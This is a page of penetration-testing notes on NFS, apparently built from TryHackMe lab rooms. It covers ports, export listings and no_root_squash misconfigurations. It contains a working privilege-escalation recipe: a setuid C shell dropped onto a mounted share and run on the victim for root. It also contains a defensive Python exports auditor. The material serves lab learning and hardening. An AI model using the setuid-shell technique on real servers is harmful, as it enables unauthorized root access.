
NFS: Notes


NFS - Network File System

To allow NFS traffic through a firewall, these ports need to be open:

  • NFS Daemon (NFSD): Runs on NFS servers and uses port 2049 for both TCP and UDP
  • Portmapper: Uses port 111 for both TCP and UDP
  • Mount daemon (mountd): Uses port 20048, which is specified in /etc/services

Show mounts on remote NFS server

# showmount -e 10.10.177.215
Export list for 10.10.177.215:
/opt/conf *
#

NFS exploit

Example of no_root_squash

[paradox@localhost tmp]$ cat /etc/exports
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
[paradox@localhost tmp]$

Yet another example of no_root_squash

john@enterprize:~$ cat /etc/exports
cat /etc/exports
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
john@enterprize:~$

On attack machine

# mkdir /tmp/nfs
# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs
mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

First mount failed

# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
#
# apt install nfs-common
# service rpcbind restart
# service statd start
# mount -o rw,vers=2 localhost:/home/james /tmp/nfs
mount.nfs: requested NFS version or transport protocol is not supported
apt install nfs-common nfs4-acl-tools
root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs
mount.nfs: Protocol not supported
root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs
root@T420:/tmp/nfs# ls /tmp/nfs
credentials.bak
root@T420:/tmp/nfs#
# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x

On NFS server (victim) machine

$ /tmp/x
#
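
A defender-side check for the /etc/exports lines shown above, as an added example (not code from the original notes): it computes each client's effective options, including "-" default option lists and the "host (rw)" space pitfall, and flags no_root_squash, insecure and wildcard clients. The function names and the /srv/pub sample entry are constructed for illustration.

```python
TOGGLES = {
    "root_squash": {"root_squash": True}, "no_root_squash": {"root_squash": False},
    "all_squash": {"all_squash": True}, "no_all_squash": {"all_squash": False},
    "secure": {"secure": True}, "insecure": {"secure": False},
    "ro": {"rw": False}, "rw": {"rw": True},
}

def parse_exports(text):
    """Yield (path, client, options) for every client entry in exports(5) text."""
    text = text.replace("\\\n", " ")                # join backslash-continued lines
    for line in text.splitlines():
        tokens = line.split("#", 1)[0].split()      # strip comments
        if len(tokens) < 2:
            continue
        path, rest, defaults = tokens[0], tokens[1:], []
        if rest[0].startswith("-"):                 # "-sync,rw": defaults for this line
            defaults = rest.pop(0)[1:].split(",")
        for tok in rest:
            client, _, raw = tok.partition("(")
            own = [o for o in raw.rstrip(")").split(",") if o]
            yield path, client or "*", defaults + own   # bare "(rw)" means any host

def audit(text):
    """Return [(path, client, [issues])]; each entry starts from exports(5) defaults."""
    findings = []
    for path, client, opts in parse_exports(text):
        st = {"root_squash": True, "all_squash": False, "secure": True, "rw": False}
        for o in opts:                              # later options override earlier ones
            st.update(TOGGLES.get(o, {}))
        issues = []
        if not st["root_squash"] and not st["all_squash"]:
            issues.append("no_root_squash+rw" if st["rw"] else "no_root_squash")
        if not st["secure"]:
            issues.append("insecure")
        if "*" in client or "?" in client:
            issues.append("wildcard-client")
        if issues:
            findings.append((path, client, issues))
    return findings

SAMPLE = """\
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
# constructed entry, not from the page:
/srv/pub -ro,no_root_squash build01(root_squash) (rw)
"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```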

References

NFS no_root_squash/no_all_squash misconfiguration PE

Network File System on Wikipedia

Practice

>>> THM | Network Services 2

>>> THM | Linux PrivEsc - Task 19 - NFS

>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing

>>> THM | Overpass 3 - Hosting

>>> THM | Enterprize

>>> THM | VulnNet: Internal
